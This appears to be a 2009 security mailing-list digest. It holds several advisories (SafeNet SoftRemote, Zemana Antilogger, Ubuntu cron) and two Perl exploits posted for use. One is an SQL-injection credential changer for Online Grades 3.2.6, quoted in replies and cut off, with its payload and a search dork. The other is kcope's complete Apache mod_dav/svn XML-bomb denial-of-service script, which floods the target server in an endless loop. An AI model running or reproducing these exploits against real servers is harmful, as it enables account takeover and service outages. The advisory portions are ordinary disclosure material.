http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkoj58gACgkQ62zWxYk/rQfG7ACcCaIP6IqB4ZybMtiz37gWHZ1t 038An3zTZ4RP8FIBwAuBI5CrSzcCQLTL =TsNN -END PGP SIGNATURE-
ZDI-09-024: Safenet SoftRemote IKE Service Remote Stack Overflow Vulnerability
ZDI-09-024: Safenet SoftRemote IKE Service Remote Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-024 June 1, 2009 -- Affected Vendors: Safenet -- Affected Products: Safenet SoftRemote -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6801. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Safenet Softremote IKE VPN service. Authentication is not required to exploit this vulnerability. The specific flaw exists in the ireIke.exe service listening on UDP port 62514. The process does not adequately handle long requests resulting in a stack overflow. Exploitation can result in complete system compromise under the SYSTEM credentials. -- Vendor Response: Safenet states: The issue has been fixed in our release version 10.8.6, customers are advised to upgrade to this version. -- Disclosure Timeline: 2008-10-28 - Vulnerability reported to vendor 2009-06-01 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Ruben Santamarta -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/
Zemana Antilogger 1.9.2 DoS attack
Severity: Critical Title: Zemana Antilogger: Denial of Service Date: May 30, 2009 Vers:1.9.2.102 ID: 200905-30 StreAmeR - 2009 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability has been discovered in Zemana Antilogger, allowing for a Denial of Service. Background == Zemana AntiLogger has a new, powerful way to protect your PC from malware attacks. Affected packages = Vers:1.9.2.102 and old versions. Description === Attempts to terminate the process by sending Close messages (called WM_CLOSE and SC_CLOSE) to all windows in the target process. This method only works if 1) the target process has at least one window, and 2) the target process doesn't handle the WM_CLOSE/SC_CLOSE message . Impact == Attacker could send specially crafted messages to the windows of the target process, resulting in a crash. Workaround == There is no known workaround at this time. Resolution == No current solution.
[USN-778-1] cron vulnerability
=== Ubuntu Security Notice USN-778-1 June 01, 2009 cron vulnerability CVE-2006-2607 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: cron3.0pl1-92ubuntu1.1 Ubuntu 8.04 LTS: cron3.0pl1-100ubuntu2.1 Ubuntu 8.10: cron3.0pl1-104+ubuntu5.1 Ubuntu 9.04: cron3.0pl1-105ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that cron did not properly check the return code of the setgid() and initgroups() system calls. A local attacker could use this to escalate group privileges. Please note that cron versions 3.0pl1-64 and later were already patched to address the more serious setuid() check referred to by CVE-2006-2607. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1.diff.gz Size/MD5:49957 be99a97742618d1ee98841b007261478 http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1.dsc Size/MD5: 693 90bd74d44d50f316995ce641b5c1748f http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1.orig.tar.gz Size/MD5:59245 4c64aece846f8483daf440f8e3dd210f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1_amd64.deb Size/MD5:66132 3c3567e4041ca920f58aff3ec370785e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1_i386.deb Size/MD5:60362 a4f44b8d8c9781053d8f545ebcde2011 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1_powerpc.deb Size/MD5:69354 b1c666c74fd2711fb0f942d57326333b sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-92ubuntu1.1_sparc.deb Size/MD5:61404 7bb09fbd5e5a2c8f479b2cb5296b6053 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1.diff.gz Size/MD5:67887 a5af279d0b7acafd0d885707e2301a97 http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1.dsc Size/MD5: 795 3680f051b5bbaa54252da7d92f10f232 http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1.orig.tar.gz Size/MD5:59245 4c64aece846f8483daf440f8e3dd210f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_amd64.deb Size/MD5:83894 72449a38f5c3ce3b3716e386a1d1fd2f i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_i386.deb Size/MD5:79432 240d6d01e1d33d9d606c19780571b0d6 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_lpia.deb Size/MD5:78234 ec5c95520d9e3e94a572c8095e976f0b powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_powerpc.deb Size/MD5:91154 5a110f1e1094522323f5773f39b10c93 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-100ubuntu2.1_sparc.deb Size/MD5:81388 6f546235162b4c89bc247453418fadfa Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1.diff.gz Size/MD5:69691 5dc135e1d9ffa07bf88a0d11cafad393 http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1.dsc Size/MD5: 1189 650b8107492613cab5713a594b3662e7 http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1.orig.tar.gz Size/MD5:59245 4c64aece846f8483daf440f8e3dd210f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1_amd64.deb Size/MD5:88220 889eec9f40f176e3eca03961b2eb6c02 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1_i386.deb Size/MD5:83228 40aaf042c987c54d18d2dda7bd1d9b6c lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/c/cron/cron_3.0pl1-104+ubuntu5.1_lpia.deb
Re: (Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6--
Why do you include TESTED ON: firefox 3? Would you not be able to trigger this bug using other browsers? On Sun, May 31, 2009 at 8:53 PM, y3nh4c...@gmail.com wrote: #!/usr/bin/perl #--- #(Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6-- #--- # #CMS INFORMATION: # #--WEB: http://www.onlinegrades.org/ #--DOWNLOAD: http://www.onlinegrades.org/ #--DEMO: http://www.onlinegrades.org/demo_info #--CATEGORY: CMS / Education #--DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same # features plus many new features. OG is a web based grade... #--RELEASED: 2009-02-05 # #CMS VULNERABILITY: # #--TESTED ON: firefox 3 #--DORK: Powered by Online Grades #--CATEGORY: SQL INJECTION #--AFFECT VERSION: = 3.2.6 #--Discovered Bug date: 2009-05-21 #--Reported Bug date: 2009-05-21 #--Fixed bug date: Not fixed #--Info patch: Not fixed #--Author: YEnH4ckEr #--mail: y3nh4ck3r[at]gmail[dot]com #--WEB/BLOG: N/A #--COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. #--EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) # # # #CONDITIONS: # # #gpc_magic_quotes=OFF # #- #PRE-REQUIREMENTS #- # #Option -- Self Registration -- Allowed (Default value) # #--- #NEED: #--- # #Valid parent id # #--- #PROOF OF CONCEPT (SQL INJECTION): #--- # #Register module (name) is vuln to sql injection. # #Full name -- y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'# # #Other parameters -- something # # #Return: Change client_id to 'owned' for parent id=1 # # ### ### ##***## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ## ##***## ##---## ##***## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##***## ### ### # # use LWP::UserAgent; use HTTP::Request; #Subroutines sub lw { my $SO = $^O; my $linux = ; if (index(lc($SO),win)!=-1){ $linux=0; }else{ $linux=1; } if($linux){ system(clear); } else{ system(cls); system (title Online Grades Attendance v-3.2.6 (Credentials changer) Exploit); system (color 02); } } sub request { my $userag = LWP::UserAgent-new; $userag - agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); if($_[2] eq post){ $request = HTTP::Request - new(POST = $_[0]); $request-referer($_[0]); $request-content_type('application/x-www-form-urlencoded'); $request-content($_[1]); }else{ $request = HTTP::Request - new(GET = $_[0]); } my $outcode= $userag-request($request)-as_string; return $outcode; } sub error { print \t\n; print \tWeb isn't vulnerable!\n\n; print \t---Maybe:\n\n; print \t\t1.-Patched.\n; print \t\t2.-Bad path or host.\n; print \t\tEXPLOIT FAILED!\n; print \t\n; } sub errormagicquotes { print \t\n; print \tWeb isn't vulnerable!\n\n; print \t\tRaison-- Magic quotes ON.\n; print \t\tEXPLOIT FAILED!\n; print \t\n; } sub helper { print \n\t[!!!] Online Grades Attendance = v-3.2.6 (Credentials changer) Exploit\n; print \t[!!!] USAGE MODE: [!!!]\n; print \t[!!!] perl $0 [HOST] [PATH] [Email Address] [Password] [Target_id]\n; print \t[!!!] [HOST]: Web.\n; print \t[!!!] [PATH]: Home Path.\n; print \t[!!!] [Email Address]: Set value\n; print \t[!!!] [Password]: Set value\n; print \t[!!!] [Target_id]: victim id\n;
Re: Re: (Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6--
Of course not. I include this information to report in details Then...when do you need a browser to launch a perl exploit? Why do you include TESTED ON: firefox 3? Would you not be able to trigger this bug using other browsers? On Sun, May 31, 2009 at 8:53 PM, y3nh4ck3r (at) gmail (dot) com [email concealed] wrote: #!/usr/bin/perl #--- #(Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6-- #--- # #CMS INFORMATION: # #--WEB: http://www.onlinegrades.org/ #--DOWNLOAD: http://www.onlinegrades.org/ #--DEMO: http://www.onlinegrades.org/demo_info #--CATEGORY: CMS / Education #--DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same # features plus many new features. OG is a web based grade... #--RELEASED: 2009-02-05 # #CMS VULNERABILITY: # #--TESTED ON: firefox 3 #--DORK: Powered by Online Grades #--CATEGORY: SQL INJECTION #--AFFECT VERSION: = 3.2.6 #--Discovered Bug date: 2009-05-21 #--Reported Bug date: 2009-05-21 #--Fixed bug date: Not fixed #--Info patch: Not fixed #--Author: YEnH4ckEr #--mail: y3nh4ck3r[at]gmail[dot]com #--WEB/BLOG: N/A #--COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. #--EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) # # # #CONDITIONS: # # #gpc_magic_quotes=OFF # #- #PRE-REQUIREMENTS #- # #Option -- Self Registration -- Allowed (Default value) # #--- #NEED: #--- # #Valid parent id # #--- #PROOF OF CONCEPT (SQL INJECTION): #--- # #Register module (name) is vuln to sql injection. # #Full name -- y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'# # #Other parameters -- something # # #Return: Change client_id to 'owned' for parent id=1 # # ### ### ##***## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ## ##***## ##---## ##***## ## GREETZ TO: SPANISH H4ck3Rs community!## ##***## ### ### # # use LWP::UserAgent; use HTTP::Request; #Subroutines sub lw { my $SO = $^O; my $linux = ; if (index(lc($SO),win)!=-1){ $linux=0; }else{ $linux=1; } if($linux){ system(clear); } else{ system(cls); system (title Online Grades Attendance v-3.2.6 (Credentials changer) Exploit); system (color 02); } } sub request { my $userag = LWP::UserAgent-new; $userag - agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); if($_[2] eq post){ $request = HTTP::Request - new(POST = $_[0]); $request-referer($_[0]); $request-content_type('application/x-www-form-urlencoded'); $request-content($_[1]); }else{ $request = HTTP::Request - new(GET = $_[0]); } my $outcode= $userag-request($request)-as_string; return $outcode; } sub error { print \t\n; print \tWeb isn't vulnerable!\n\n; print \t---Maybe:\n\n; print \t\t1.-Patched.\n; print \t\t2.-Bad path or host.\n; print \t\tEXPLOIT FAILED!\n; print \t\n; } sub errormagicquotes { print \t\n; print \tWeb isn't vulnerable!\n\n; print \t\tRaison-- Magic quotes ON.\n; print \t\tEXPLOIT FAILED!\n; print \t\n; } sub helper { print \n\t[!!!] Online Grades Attendance = v-3.2.6 (Credentials changer) Exploit\n; print \t[!!!] USAGE MODE: [!!!]\n; print \t[!!!]
The father of all bombs - another webdav fiasco
Apache mod_dav / svn Remote Denial of Service Exploit Google Dorks: inurl:svn inurl:trunk powered by subversion version Information on the bug (XML Bomb): http://blog.didierstevens.com/2008/09/23/dismantling-an-xml-bomb/ Enjoy! --- ###apache-ied.pl ### Apache mod_dav / svn Remote Denial of Service Exploit ### by kcope / June 2009 ### ### Will exhaust all system memory ### Needs Authentication on normal DAV ### ### This can be especially serious stuff when used against ### svn (subversion) servers!! Svn might let the PROPFIND slip through ### without authentication. bwhahaaha :o) ### use at your own risk! ## use IO::Socket; use MIME::Base64; sub usage { print Apache mod_dav / svn Remote Denial of Service Exploit\n; print by kcope in 2009\n; print usage: perl apache-ied.pl remotehost webdav folder [username] [password]\n; print example: perl apache-ied.pl svn.XXX.com /projects/\n;exit; } if ($#ARGV 1) {usage();} $hostname = $ARGV[0]; $webdavfile = $ARGV[1]; $username = $ARGV[2]; $password = $ARGV[3]; $|=1; $BasicAuth = encode_base64($username:$password); chomp $BasicAuth; my $sock = IO::Socket::INET-new(PeerAddr = $hostname, PeerPort = 80, Proto= 'tcp'); print $sock PROPFIND $webdavfile HTTP/1.1\r\n; print $sock Host: $hostname\r\n; print $sock Depth: 0\r\n; print $sock Connection: close\r\n; if ($username ne ) { print $sock Authorization: Basic $BasicAuth\r\n; } print $sock \r\n; $x = $sock; print $x; if (!($x =~ /207/)) { while($sock) { print; } close($sock); print No PROPFIND on this server and path.\n; exit(0); } $a = ; for ($i=1;$i256;$i++) {# Here you can increase the XML bomb count $k = $i-1; $a .= !ENTITY x$i \x$k;x$k;\\n } $igzml = ?xml version=\1.0\?\n .!DOCTYPE REMOTE [\n .!ELEMENT REMOTE ANY\n .!ENTITY x0 \b4bew1thb1gb00bs\\n .$a .]\n .REMOTE\n .x$k;\n ./REMOTE\n; print Apache mod_dav / svn Remote Denial of Service Exploit\n; print by kcope in 2009\n; print Launching DoS Attack...\n; $ExploitRequest = PROPFIND $webdavfile HTTP/1.1\r\n .Host: $hostname\r\n .Depth: 0\r\n; if ($username ne ) { $ExploitRequest .= Authorization: Basic $BasicAuth\r\n; } $ExploitRequest .= Content-Type: text/xml\r\nContent-Length: .length($igzml).\r\n\r\n . $igzml; while(1) { again: my $sock = IO::Socket::INET-new(PeerAddr = $hostname, PeerPort = 80, Proto= 'tcp') || (goto again); print $sock $ExploitRequest; print ;Pp; }